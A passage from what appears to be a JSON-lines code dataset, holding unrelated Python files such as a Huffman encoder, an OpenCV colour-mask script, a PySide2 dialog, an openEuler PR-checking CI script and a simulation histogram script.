db.statements\n#import_aep(collection)\n#import_enrolment(collection)\n#import_performance(collection)\n#import_assmatr(collection)\nimport_login_logout(collection)\n","sub_path":"import/src/import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":8802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"125778456","text":"from bangazon import *\nimport random\n\nclass Employee():\n\n\tdef __init__(self, fn, ln):\n\t\tself.name = fn + \" \" + ln\n\t\t\n\tdef get_name(self):\n\t\treturn self.name\n\n# eat() - Will select a random restaurant name from a list of strings, print to console that the employee at at that restaurant, and also return the restaurant.\n\n\tdef eat(self, food = \"\", companions = \"\"):\n\t\trestaurants = [\"Biscuit Head\", \"Tupelo Honey\", \"Five Mile\", \"Rhubarb\"]\n\t\trestaurant_picker = random.choice(restaurants)\n\t\tspace = \" \"\n\t\t\n\t\tif (food == \"sandwich\"):\n\t\t\tprint(\"{} ate a sandwich at the office.\".format(self.name))\n\n\n\t\telif (companions != \"\" and food != \"\"):\n\t\t\tprint(\"{} went to {} with {} and ate {}\".format(self.name, restaurant_picker, space.join(companions), food))\n\n\t\t\n\t\telif (companions != \"\"):\n\t\t\tspace = \" \"\n\t\t\tprint(\"{} ate lunch at {} with {}\".format(self.name, restaurant_picker, space.join(companions)))\n\t\t\n\t\telse:\n\t\t\tprint(\"{} is at {}\".format(self.name, restaurant_picker))\n\t\t\treturn restaurant_picker\n\n\n\n\n","sub_path":"class_employee.py","file_name":"class_employee.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"367116697","text":"from collections import defaultdict, namedtuple\nfrom heapq import heappush, heappop, heapify\nfrom pathlib import Path\nimport struct\nimport numpy as np\n\nNode = namedtuple('Node', 'freq value left right')\nNode.__lt__ = lambda x, y: x.freq < y.freq\n\n\ndef huffman_encode(arr, save_dir='./'):\n \"\"\"\n Encodes numpy array 'arr' and saves to save_dir\n The names of binary files are prefixed with prefix\n returns the number of bytes for the tree and the data after the compression\n \"\"\"\n if len(arr) == 0:\n return 0, 0\n\n # Infer dtype\n dtype = str(arr.dtype)\n\n # Calculate frequency in arr\n freq_map = defaultdict(int)\n convert_map = {'float32': float, 'int32': int}\n for value in np.nditer(arr):\n value = convert_map[dtype](value)\n freq_map[value] += 1\n\n # Make heap\n heap = [Node(frequency, value, None, None) for value, frequency in freq_map.items()]\n heapify(heap)\n\n # Merge nodes\n while len(heap) > 1:\n node1 = heappop(heap)\n node2 = heappop(heap)\n merged = Node(node1.freq + node2.freq, None, node1, node2)\n heappush(heap, merged)\n\n # Generate code value mapping\n value2code = dict()\n\n def generate_code(node, code):\n if node is None:\n return\n if node.value is not None:\n value2code[node.value] = code\n return\n generate_code(node.left, code + '0')\n generate_code(node.right, code + '1')\n\n root = heappop(heap)\n generate_code(root, '')\n\n # Path to save location\n directory = Path(save_dir)\n\n # Dump data\n data_encoding = ''.join(value2code[convert_map[dtype](value)] for value in np.nditer(arr))\n datasize = dump(data_encoding)\n\n # Dump codebook (huffman tree)\n codebook_encoding = encode_huffman_tree(root, dtype)\n treesize = dump(codebook_encoding)\n\n return treesize, datasize\n\n\n# Logics to encode / decode huffman tree\n# Referenced the idea from https://stackoverflow.com/questions/759707/efficient-way-of-storing-huffman-tree\ndef encode_huffman_tree(root, dtype):\n \"\"\"\n Encodes a huffman tree to string of '0's and '1's\n \"\"\"\n converter = {'float32':float2bitstr, 'int32':int2bitstr}\n code_list = list()\n\n def encode_node(node):\n if node.value is not None: # node is leaf node\n code_list.append('1')\n lst = list(converter[dtype](node.value))\n code_list.extend(lst)\n else:\n code_list.append('0')\n encode_node(node.left)\n encode_node(node.right)\n\n encode_node(root)\n return ''.join(code_list)\n\n\ndef decode_huffman_tree(code_str, dtype):\n \"\"\"\n Decodes a string of '0's and '1's and costructs a huffman tree\n \"\"\"\n converter = {'float32': bitstr2float, 'int32': bitstr2int}\n idx = 0\n\n def decode_node():\n nonlocal idx\n info = code_str[idx]\n idx += 1\n if info == '1': # Leaf node\n value = converter[dtype](code_str[idx: idx+32])\n idx += 32\n return Node(0, value, None, None)\n else:\n left = decode_node()\n right = decode_node()\n return Node(0, None, left, right)\n\n return decode_node()\n\n\n# My own dump / load logics\ndef dump(code_str):\n \"\"\"\n code_str : string of either '0' and '1' characters\n this function dumps to a file\n returns how many bytes are written\n \"\"\"\n # Make header (1 byte) and add padding to the end\n # Files need to be byte aligned.\n # Therefore we add 1 byte as a header which indicates how many bits are padded to the end\n # This introduces minimum of 8 bits, maximum of 15 bits overhead\n num_of_padding = -len(code_str) % 8\n header = \"{:08b}\".format(num_of_padding)\n code_str = header + code_str + '0' * num_of_padding\n\n # Convert string to integers and to 
real bytes\n    byte_arr = bytearray(int(code_str[i:i+8], 2) for i in range(0, len(code_str), 8))\n    # Return the number of bytes that would be written\n    return len(byte_arr)\n\n\ndef load(filename):\n    \"\"\"\n    This function reads a file and makes a string of '0's and '1's\n    \"\"\"\n    with open(filename, 'rb') as f:\n        header = f.read(1)\n        rest = f.read()  # bytes\n    code_str = ''.join('{:08b}'.format(byte) for byte in rest)\n    offset = ord(header)\n    if offset != 0:\n        code_str = code_str[:-offset]  # string of '0's and '1's\n    return code_str\n\n\n# Helper functions for converting between bit string and (float or int)\ndef float2bitstr(f):\n    four_bytes = struct.pack('>f', f)  # bytes\n    return ''.join('{:08b}'.format(byte) for byte in four_bytes)  # string of '0's and '1's\n\n\ndef bitstr2float(bitstr):\n    byte_arr = bytearray(int(bitstr[i:i+8], 2) for i in range(0, len(bitstr), 8))\n    return struct.unpack('>f', byte_arr)[0]\n\n\ndef int2bitstr(integer):\n    four_bytes = struct.pack('>I', integer)  # bytes\n    return ''.join('{:08b}'.format(byte) for byte in four_bytes)  # string of '0's and '1's\n\n\ndef bitstr2int(bitstr):\n    byte_arr = bytearray(int(bitstr[i:i+8], 2) for i in range(0, len(bitstr), 8))\n    return struct.unpack('>I', byte_arr)[0]\n\n\n# Functions for calculating / reconstructing index diff\ndef calc_index_diff(indptr, maxdiff):\n    org_diff = indptr[1:] - indptr[:-1]\n    diff = list()\n    for v in org_diff:\n        n = v / maxdiff\n        for i in range(int(n)):\n            diff.append(maxdiff)\n            v -= maxdiff\n        diff.append(v)\n    return np.array(diff).astype(np.float32)\n\n\ndef calc_indice_diff(indices, maxdiff):\n    org_diff = indices[1:] - indices[:-1]\n    diff = list()\n    for v in org_diff:\n        if v > 0:\n            n = v / maxdiff\n            for i in range(int(n)):\n                diff.append(maxdiff)\n                v -= maxdiff\n            diff.append(v)\n        else:\n            diff.append(abs(v))\n    return np.array(diff).astype(np.float32)\n\n\ndef reconstruct_indptr(diff):\n    return np.concatenate([[0], np.cumsum(diff)])\n\n\n# Encode / Decode models\ndef huffman_encode_model(model, directory='encodings/'):\n    t0, d0 = huffman_encode(model, directory)\n\n    # Print statistics\n    original = model.nbytes\n    compressed = t0 + d0\n\n    original_total = original\n    compressed_total = compressed\n\n    print('original:{} bytes; after:{} bytes'.format(original_total, compressed_total))\n\n    return original_total, compressed_total, t0, d0\n","sub_path":"huffmancoding.py","file_name":"huffmancoding.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"543729375","text":"\nimport cv2\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom matplotlib import pyplot as plt\n\nparser = ArgumentParser()\nparser.add_argument(\"image_path\", type=str, help=\"imagen a procesar\")\nparser.add_argument(\"hue_threshold\", type=float, help=\"umbral de hue\")\nargs = parser.parse_args()\n\nx1 = 190\ny1 = 140\nx2 = 530\ny2 = 480\n\nimg = cv2.imread(args.image_path)\noutput = img.copy()\n\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HLS)\ncrop = hsv[y1:y2, x1:x2]\n\ntarget_hue = cv2.calcHist([crop], [0], None, [181], [0, 180])\ncv2.normalize(target_hue, target_hue, 0, 99, cv2.NORM_MINMAX)\n\nh, w, c = hsv.shape\nhue_mask = np.zeros((h, w), dtype=np.uint8)\nsat_mask = np.zeros((h, w), dtype=np.uint8)\nlum_mask = np.zeros((h, w), dtype=np.uint8)\n\n#luminosity threshold\nlum_max = crop[:, :, 1].max()\nlum_min = crop[:, :, 1].min()\n#saturation threshold\nsat_max = crop[:, :, 2].max()\nsat_min = crop[:, :, 2].min()\n\n#produce masks\nfor x in (x for x in range(w)):\n for y in (y for y in range(h)):\n if target_hue[hsv[y, x, 0]] >= args.hue_threshold:\n hue_mask[y, x] = 255\n if lum_min <= hsv[y, x, 1] <= lum_max:\n lum_mask[y, x] = 255\n if sat_min <= hsv[y, x, 2] <= sat_max:\n sat_mask[y, x] = 255\n\noutput[:, :, 0] &= (hue_mask & lum_mask & sat_mask)\noutput[:, :, 1] &= (hue_mask & lum_mask & sat_mask)\noutput[:, :, 2] &= (hue_mask & lum_mask & sat_mask)\n\ncv2.imshow(\"source\", img)\ncv2.imshow(\"crop\", cv2.cvtColor(crop, cv2.COLOR_HLS2BGR))\ncv2.imshow(\"output\", output)\ncv2.waitKey(0)","sub_path":"Patrones/Tarea4/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"283632973","text":"# 5476. 找出数组游戏的赢家.py\nfrom typing import List\n\n\nclass Solution:\n def getWinner(self, arr: List[int], k: int) -> int:\n n = len(arr)\n if k >= n - 1:\n return max(arr)\n i = 0\n cont = 0\n while cont < k:\n if arr[i] > arr[i + 1]:\n arr.append(arr[i + 1])\n arr[i + 1] = arr[i]\n cont += 1\n else:\n arr.append(arr[i])\n cont = 1\n i += 1\n return arr[i]\n\n\nclass Solution:\n def getWinner(self, arr: List[int], k: int) -> int:\n if k >= len(arr) - 1:\n return max(arr)\n cur, tmp = arr[0], k\n for i in range(1, len(arr)):\n if cur > arr[i]:\n tmp -= 1\n else:\n cur = arr[i]\n tmp = k - 1\n if tmp == 0:\n return cur\n return cur\n\n\ndef main():\n sol = Solution()\n\n arr = [2, 1, 3, 5, 4, 6, 7]\n k = 2\n res = sol.getWinner(arr, k)\n print(res)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Week08/周赛(不要去死磕)/5476. 找出数组游戏的赢家.py","file_name":"5476. 找出数组游戏的赢家.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"82529070","text":"# Runtime 98ms, Beats 62.84%\n# Basic idea: Siliding window\nclass Solution(object):\n def checkInclusion(self, s1, s2):\n \"\"\"\n :type s1: str\n :type s2: str\n :rtype: bool\n \"\"\"\n dic = {}\n for i in s1:\n dic[i] = dic.get(i,0)+1\n lens = len(s1)\n idx,sw,sw_s,dic2 = 0,0,0,{}\n while idx= len(A):\n window[B[i - len(A)]] -= 1\n if window == target:\n return True\n return False\n \n","sub_path":"Two Pointer/567.Permutation in String.py","file_name":"567.Permutation in String.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"409230690","text":"from PySide2 import QtWidgets, QtGui, QtCore\nimport numpy as np\nfrom fseutil.lib.fse_thermal_radiation_3d import single_receiver, heat_flux_to_temperature\nfrom fseutil.etc.images_base64 import dialog_0404_br187_perpendicular_figure_1\nfrom fseutil.gui.layout.dialog_0405_thermal_radiation_extreme import Ui_MainWindow\n\n\nclass Dialog0405(QtWidgets.QMainWindow):\n maximum_acceptable_thermal_radiation_heat_flux = 12.6\n\n def __init__(self, parent=None):\n super(Dialog0405, self).__init__(parent)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.setWindowTitle('Thermal Radiation Analysis Extreme')\n\n from fseutil.gui.logic.common import filter_objects_by_name\n for i in filter_objects_by_name(self.ui.groupBox_out, object_types=[QtWidgets.QLineEdit]):\n try:\n i.setReadOnly(True)\n except AttributeError:\n i.setEnabled(False)\n\n # set up radiation figure\n ba = QtCore.QByteArray.fromBase64(dialog_0404_br187_perpendicular_figure_1)\n pix_map = QtGui.QPixmap()\n pix_map.loadFromData(ba)\n self.ui.label.setPixmap(pix_map)\n\n # set default values\n self.ui.lineEdit_in_emitter_points.setText('1000')\n self.ui.lineEdit_in_receiver_initial_temperature.setText('293.15')\n\n # set signals\n self.ui.pushButton_test.clicked.connect(self.test)\n self.ui.pushButton_calculate.clicked.connect(self.calculate)\n\n def keyPressEvent(self, event):\n if event.key() == 16777221 or event.key() == 16777220 or event.key() == QtCore.Qt.Key_Enter:\n self.copy_file_name()\n elif event.key() == QtCore.Qt.Key_Escape:\n self.close()\n\n def test(self):\n\n self.ui.plainTextEdit_in_emiter_xyz.setPlainText('0,0,5\\n0,5,5\\n5,5,5\\n5,0,5')\n self.ui.lineEdit_in_emitter_normal.setText('0,0,-1')\n self.ui.lineEdit_in_receiver_location.setText('2.5,2.5,0')\n self.ui.lineEdit_in_receiver_normal.setText('0,0,1')\n self.ui.lineEdit_in_Q.setText('100')\n\n self.calculate()\n\n self.repaint()\n\n def calculate(self):\n\n # clear ui output fields\n self.ui.lineEdit_out_Phi.setText('')\n self.ui.lineEdit_out_q.setText('')\n self.ui.lineEdit_out_T.setText('')\n\n # parse inputs from ui\n emitter_points = int(self.ui.lineEdit_in_emitter_points.text())\n emitter_vertices = list()\n for i in [i.split(',') for i in str.strip(self.ui.plainTextEdit_in_emiter_xyz.toPlainText()).replace(' ', '').split('\\n')]:\n if len(i) == 0:\n continue\n i_ = list()\n for j in i:\n i_.append(float(j))\n emitter_vertices.append(i_)\n emitter_normal = [float(i) for i in self.ui.lineEdit_in_emitter_normal.text().split(',')]\n receiver_xyz = [float(i) for i in self.ui.lineEdit_in_receiver_location.text().split(',')]\n receiver_normal = [float(i) for i in self.ui.lineEdit_in_receiver_normal.text().split(',')]\n receiver_initial_temperature = float(self.ui.lineEdit_in_receiver_initial_temperature.text())\n Q = float(self.ui.lineEdit_in_Q.text())\n\n # calculate\n emitter_temperature = heat_flux_to_temperature(Q*1000)\n receiver_heat_flux, phi = single_receiver(\n ep_vertices=np.array(emitter_vertices),\n ep_norm=np.array(emitter_normal),\n ep_temperature=emitter_temperature,\n n_points=emitter_points, # number of hot spots\n rp_vertices=np.array(receiver_xyz),\n rp_norm=np.array(receiver_normal),\n rp_temperature=receiver_initial_temperature\n )\n\n # write results to ui\n self.ui.lineEdit_out_Phi.setText(f'{phi:.4f}')\n self.ui.lineEdit_out_q.setText(f'{receiver_heat_flux/1000:.2f}')\n self.ui.lineEdit_out_T.setText(f'{emitter_temperature:.2f}')\n\n # refresh ui\n 
self.repaint()\n","sub_path":"fseutil/gui/logic/dialog_0405_thermal_radiation_extreme.py","file_name":"dialog_0405_thermal_radiation_extreme.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"600833919","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/4/21 15:16\n# @FileName: tc-ci.py\n# @Software: PyCharm\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport click\nimport requests\nimport time\nimport re\nimport datetime\nimport traceback\nfrom functools import wraps\nfrom collections import defaultdict\nfrom urllib.parse import unquote\nfrom enum import Enum\n\n\nclass Errcode:\n CODE_0 = \"oEEP 文件头的类型需要为:{}\"\n CODE_1 = \"oEEP 文件头的状态需要为:{}\"\n CODE_2 = \"oEEP 文件头的编号不满足格式:oEEP-xxxx\"\n CODE_3 = \"oEEP 文件头的创建时间不满足格式YYYY-MM-DD\"\n CODE_4 = \"oEEP 文件头的修改时间不满足格式YYYY-MM-DD\"\n CODE_5 = \"oEEP 文件头必须在文件的第一行且必须满足---***---格式\"\n CODE_6 = \"oEEP 文件头的字段缺少:{}\"\n CODE_7 = \"oEEP 文件头的字段多余:{}\"\n CODE_8 = \"oEEP-0000 oEEP 索引.md文件缺少对应PR的索引\"\n\n def __init__(self):\n pass\n\n\ndef is_datetime(value):\n try:\n datetime.datetime.strptime(value, \"%Y-%m-%d\")\n return True\n except ValueError:\n return False\n\n\nclass GitConfig(Enum):\n group = \"openeuler\"\n repos = \"TC\"\n clone_cmd = \"git clone {} {}\"\n merge_cmd = \"git merge --no-edit pr_{n}\"\n checkout_cmd = \"git checkout -b working_pr_{n}\"\n fetch_cmd = \"git fetch {gitee_url} pull/{n}/head:pr_{n}\"\n checkout_branch_cmd = \"git checkout {}\"\n pull_cmd = \"git pull\"\n\n\nclass GlobalConfig(Enum):\n pr_info_url = \"https://gitee.com/{}/{}/pulls/{}.diff\"\n header = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0\"}\n relative_index_path = \"oEEP/oEEP-0000 oEEP 索引.md\"\n header_type = [\"特性变更\", \"信息整理\", \"流程设计\"]\n header_status = [\"初始化\", \"基本成型\", \"接纳\", \"活跃\", \"不活跃\", \"完成\", \"撤回\", \"拒绝\", \"被替代\"]\n header_lambda = {\n \"标题\": lambda x: \"\",\n \"类别\": lambda x: \"\" if x in GlobalConfig.header_type.value else Errcode.CODE_0.format(\n \",\".join(GlobalConfig.header_type.value)),\n \"摘要\": lambda x: \"\",\n \"作者\": lambda x: \"\",\n \"状态\": lambda x: \"\" if x in GlobalConfig.header_status.value else Errcode.CODE_1.format(\n \",\".join(GlobalConfig.header_status.value)),\n \"编号\": lambda x: \"\" if re.match(r\"oEEP-\\d\\d\\d\\d\", x) else Errcode.CODE_2,\n \"创建日期\": lambda x: \"\" if is_datetime(x) else Errcode.CODE_3,\n \"修订日期\": lambda x: \"\" if is_datetime(x) else Errcode.CODE_4,\n }\n\n\ndef func_retry(tries=3, delay=1):\n \"\"\"retry func\"\"\"\n\n def deco_retry(fn):\n @wraps(fn)\n def inner(*args, **kwargs):\n for i in range(tries):\n try:\n return fn(*args, **kwargs)\n except Exception as e:\n print(\"func_retry:{} e:{} traceback: {}\".format(fn.__name__, e, traceback.format_exc()))\n time.sleep(delay)\n else:\n raise RuntimeError(\"func_retry:{} over tries, failed\".format(fn.__name__))\n\n return inner\n\n return deco_retry\n\n\ndef execute_cmd3(cmd, timeout=30, err_log=True):\n \"\"\"execute cmd\"\"\"\n try:\n print(\"execute_cmd3 call cmd: %s\" % cmd)\n p = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True, close_fds=True)\n t_wait_seconds = 0\n while True:\n if p.poll() is not None:\n break\n if timeout >= 0 and t_wait_seconds >= (timeout * 100):\n p.terminate()\n return -1, \"\", \"execute_cmd3 exceeded time {0} seconds in executing: {1}\".format(timeout, cmd)\n time.sleep(0.01)\n t_wait_seconds += 1\n out, err = p.communicate()\n ret = p.returncode\n if ret != 0 and err_log:\n print(\"execute_cmd3 cmd %s return %s, std output: %s, err output: %s.\", cmd, ret, out, err)\n return ret, out, err\n except Exception as e:\n return -1, \"\", \"execute_cmd3 exceeded raise, e={0}, trace={1}\".format(e.args[0], 
traceback.format_exc())\n\n\n@func_retry(tries=3, delay=2)\ndef request_pr_info(url):\n \"\"\"request pr info\"\"\"\n ret = requests.get(url, headers=GlobalConfig.header.value, timeout=(30, 30))\n if not str(ret.status_code).startswith(\"2\") and not str(ret.status_code).startswith(\"3\"):\n raise Exception(\"request pr info failed: {}--->{}\".format(url, ret.status_code))\n else:\n return ret.content\n\n\ndef parse_pr_info(content):\n \"\"\"Parse the PR information to be submitted\"\"\"\n path_list = list()\n content = content.decode(\"utf-8\")\n content_list = re.findall(\"diff --git(.*?)\\n\", content)\n for content in content_list:\n path = content.split(\"b/\")[-1].strip()\n path = path.replace('\"', \"\")\n if path.startswith(\"oEEP/oEEP-\") and not path.startswith(\"oEEP/oEEP-0000\"):\n path_list.append(path)\n return list(set(path_list))\n\n\ndef parse_index_info(content):\n \"\"\"parse index from oEEP/oEEP-0000 oEEP 索引.md\"\"\"\n try:\n content = content.split(\"## 索引:\")[-1].split(\"## oEEP 类型分类:\")[0].strip()\n list_title = re.findall(r\"\\((.*?)\\)\", content)\n return [unquote(title, \"utf-8\") for title in list_title]\n except IndexError:\n return list()\n\n\ndef read_content(path):\n \"\"\"read content from path\"\"\"\n with open(path, \"r\") as f:\n return f.read()\n\n\ndef ci_check(pr_id, path):\n \"\"\"ci check tc\"\"\"\n # 1.Get the path of the modified file from pr.diff\n print(\"-\" * 25 + \"start to parse pr-{}\".format(pr_id) + \"-\" * 25)\n url = GlobalConfig.pr_info_url.value.format(GitConfig.group.value, GitConfig.repos.value, pr_id)\n pr_content = request_pr_info(url)\n list_file_path = parse_pr_info(pr_content)\n # 2.read content from oEEP/oEEP-0000 oEEP 索引.md\n print(\"-\" * 25 + \"start to parse oEEP/oEEP-0000 oEEP 索引.md\" + \"-\" * 25)\n abs_index_path = os.path.join(path, GlobalConfig.relative_index_path.value)\n index_content = read_content(abs_index_path)\n list_index_path = parse_index_info(index_content)\n # 3.Read the information submitted by PR\n print(\"-\" * 25 + \"start to check pr info\" + \"-\" * 25)\n dict_content = dict()\n for file_path in list_file_path:\n cur_path = str()\n abs_path = os.path.join(path, file_path)\n dir_name = os.path.dirname(abs_path)\n file_name = os.path.basename(abs_path)\n prefix_file_name = file_name.split(\" \")[0]\n for dir_path, _, filenames in os.walk(dir_name):\n for filename in filenames:\n if filename.startswith(prefix_file_name):\n cur_path = os.path.join(dir_path, filename)\n if not cur_path:\n print(\"The current path:{} is not exist.\".format(file_path))\n continue\n base_name = os.path.basename(cur_path)\n dict_content[base_name] = read_content(cur_path)\n dict_error_result = defaultdict(list)\n for file_name, content in dict_content.items():\n if file_name not in list_index_path:\n dict_error_result[file_name].append(Errcode.CODE_8)\n file_hearder = re.match(r\"---\\n(.*\\n)+---\", content)\n if file_hearder:\n meta_data = file_hearder.group()\n exist_key = list()\n for meta in meta_data.split(\"\\n\"):\n if \":\" not in meta:\n continue\n key, content = meta.split(\":\")\n key, content = key.strip(), content.strip()\n msg = GlobalConfig.header_lambda.value.get(key) and GlobalConfig.header_lambda.value[key](content)\n if msg:\n dict_error_result[file_name].append(msg)\n exist_key.append(key)\n need_keys = GlobalConfig.header_lambda.value.keys()\n lack = set(need_keys) - set(exist_key)\n if lack:\n msg = Errcode.CODE_6.format(\",\".join(list(lack)))\n dict_error_result[file_name].append(msg)\n redundancy = 
set(exist_key) - set(need_keys)\n if redundancy:\n msg = Errcode.CODE_7.format(\",\".join(list(redundancy)))\n dict_error_result[file_name].append(msg)\n else:\n dict_error_result[file_name].append(Errcode.CODE_5)\n print(\"-\" * 25 + \"start to output result\" + \"-\" * 25)\n for file_name, err_msg in dict_error_result.items():\n print(\"\\033[31mCheck file:{} fail!\\033[0m\".format(file_name))\n print(\"\\033[31mThe reason is:{}\\033[0m\".format(\",\".join(err_msg)))\n if dict_error_result.keys():\n return True\n\n\ndef local_repo_name(group, repo_name, pull_id):\n \"\"\"\n combine name to avoid name conflit\n \"\"\"\n return \"{}_{}_{}\".format(group, repo_name, pull_id)\n\n\n@func_retry()\ndef prepare_env(work_dir, group, repo_name, pull_id, local_path, branch=\"master\"):\n \"\"\"\n prepare local reposity base and PR branch\n Notice: this will change work directory,\n action related to obtain path need do before this.\n \"\"\"\n if not os.path.exists(work_dir):\n os.makedirs(work_dir)\n repo = group + \"/\" + repo_name\n gitee_url = \"https://gitee.com/{repo}.git\".format(repo=repo)\n if os.path.exists(local_path):\n print(\"WARNING: %s already exist, delete it.\" % local_path)\n shutil.rmtree(local_path)\n ret, out, err = execute_cmd3(GitConfig.clone_cmd.value.format(gitee_url, local_path))\n if ret != 0:\n print(\"Failed to git clone {}, err:{}, out:{}\".format(gitee_url, err, out))\n return 1\n os.chdir(local_path)\n ret, _, _ = execute_cmd3(GitConfig.checkout_branch_cmd.value.format(branch))\n if ret != 0:\n print(\"Failed to checkout %s branch\" % branch)\n return 1\n ret, _, _ = execute_cmd3(GitConfig.pull_cmd.value)\n if ret != 0:\n print(\"Failed to update to latest commit in %s branch\" % branch)\n return 1\n ret, _, _ = execute_cmd3(GitConfig.fetch_cmd.value.format(gitee_url=gitee_url, n=pull_id))\n if ret != 0:\n print(\"Failed to fetch PR:{n}\".format(n=pull_id))\n return 1\n ret, _, _ = execute_cmd3(GitConfig.checkout_cmd.value.format(n=pull_id))\n if ret != 0:\n print(\"Failed to create working branch working_pr_{n}\".format(n=pull_id))\n return 1\n ret, _, _ = execute_cmd3(GitConfig.merge_cmd.value.format(n=pull_id))\n if ret != 0:\n print(\"Failed to merge PR:{n} to branch:{base}\".format(n=pull_id, base=branch))\n return 1\n return 0\n\n\n@click.command()\n@click.option(\"--pr_id\", help=\"the pr_id of git\")\n@click.option(\"--work_dir\", help=\"the work dir\")\ndef main(pr_id, work_dir):\n if not pr_id:\n raise RuntimeError(\"invalid pr_id\")\n if not work_dir or not os.path.exists(work_dir):\n raise RuntimeError(\"invalid work_dir\")\n group = GitConfig.group.value\n repo_name = GitConfig.repos.value\n local_repo_path = local_repo_name(group, repo_name, pr_id)\n local_path = os.path.join(work_dir, local_repo_path)\n result = prepare_env(work_dir, group, repo_name, pr_id, local_path)\n if result:\n print(\"prepare env failed\")\n sys.exit(-1)\n result = ci_check(pr_id, local_path)\n if os.path.exists(local_path):\n shutil.rmtree(local_path)\n if result:\n sys.exit(-1)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"ci/tools/tc-ci/tc-ci.py","file_name":"tc-ci.py","file_ext":"py","file_size_in_byte":11370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"442770279","text":"import numpy as np\nimport matplotlib.pyplot as plt\nnp.set_printoptions(precision=12)\nnp.set_printoptions(suppress=True)\ndef readrow(row, cols): \n data = np.fromstring(row, sep=' ')\n data.resize((cols,))\n return data\nnum_lev=21\nnum_mut=20\n\ndirectory='correct_alpha_0.020_beta_0.70_mu_1.0e-05_exp9_1.20/'\ncp_time=np.zeros(1)\nbc_per=np.zeros(1)\ntotal_per=np.zeros(1)\ntotal_time=np.zeros(1)\nfor i in range(1,2000):\n file=directory+'blood_'+str(i)+'.txt'\n try:\n with open(file) as f:\n data=np.array([readrow(row, (num_mut+1)*num_lev+1) for row in f])\n except:\n continue\n time_array=data[:,0]/365.0\n dict_leuke=np.empty((num_lev,),dtype=object) \n for i in range(num_lev):\n dict_leuke[i]=[k+i for k in range(1,(num_mut+1)*num_lev+1,num_lev)]\n total_leuke_blood=np.empty((num_lev,),dtype=object)\n for i in range(0,num_lev):\n total_leuke_blood[i]=np.sum(data[:,dict_leuke[i]],axis=1)\n total_wbc=np.sum(data[:,1:],axis=1)\n long=np.shape(total_leuke_blood[0])[0]\n bcr_abl_cells=np.zeros((long,num_lev))\n for k in range(0,long):\n for i in range(0,num_lev):\n bcr_abl_cells[k,i]=total_leuke_blood[i][k]/total_wbc[k]\n total_per=np.append(total_per,np.amax(bcr_abl_cells[-1,17]*100))\n bp_init=np.argmax(-np.diff(bcr_abl_cells[:,17]*100)>0)\n bc_per=np.append(bc_per,bcr_abl_cells[bp_init-10,17]*100)\n bc_per_var=bcr_abl_cells[bp_init-10,17]*100\n total_time=np.append(total_time,time_array[-1])\n if bc_per_var>50:\n print(bc_per_var,file)\n print(time_array[-1],file)\n if time_array[-1]>19.9:\n print(time_array[-1],file)\n if np.amax(bcr_abl_cells[:,17])*100>10.0:\n cp_time_var=time_array[bcr_abl_cells[:,17]*100>10.0][0]-time_array[bcr_abl_cells[:,17]*100>0.0][0]\n cp_time=np.append(cp_time,cp_time_var)\nbc_per=np.delete(bc_per,0)\ntotal_time=np.delete(total_time,0)\nbins=20\nplt.hist(total_time,bins)\nplt.title('a')\nplt.figure(1)\nplt.hist(bc_per,bins,color='blue')\nplt.title('Blast percentage when critical mutation appears',fontsize=20)\nplt.xlabel('Time (years)',fontsize=20)\nplt.ylabel('Number of patients',fontsize=20)\nplt.tick_params(axis='both',labelsize='xx-large')\nplt.figure(2)\ncp_time=np.delete(cp_time,0)\ntotal_per=np.delete(total_per,0)\nplt.hist(cp_time,bins,color='blue')\nplt.title('Duration of chronic phase',fontsize=20)\nplt.xlabel('Time (years)',fontsize=20)\nplt.ylabel('Number of patients',fontsize=20)\nplt.tick_params(axis='both',labelsize='xx-large')\nplt.figure(3)\nplt.hist(total_per,bins)\nplt.title('total_per')\nplt.hist(cp_time,bins,color='blue')\nplt.figure(4)\n","sub_path":"global_data_analysis.py","file_name":"global_data_analysis.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"418529722","text":"from __future__ import print_function\n\nimport os\nimport unittest\nimport mock\n\nimport imp\nimp.load_source('parse_changelog',\n os.path.join(os.path.dirname(__file__),\n '..', 'bin', 'parse_changelog'))\n\nimport parse_changelog\n\nclass ChangelogRstSamplesTest(unittest.TestCase):\n\n maxDiff = None\n\n def test_sample_full(self):\n sample = \"\"\"\nChangelog for package foo\n=========================\n\n0.1\n===\n\n0.1.27\n^^^^^^\n\n- dash for bullet list\n\n.. rst comment\n\n0.1.26\n^^^^^^\n\n.. DANGER:: Do not read this\n\n.. |reST| replace:: reStructuredText\n\n* substitutions in |reST|\n\nCopyright |copy| 2003\n\n.. |copy| unicode:: 0xA9 .. copyright sign\n\n+ using + for bullet list, and reference `Python `_\n+ second element *emphasized*\n\n0.1.4\n=====\n\ntext without bullet list\n\n0.1.3 (unstable)\n================\n\nsection title with added comment\n\"\"\"\n result = parse_changelog.get_version_sections(sample)\n result_no_sections = 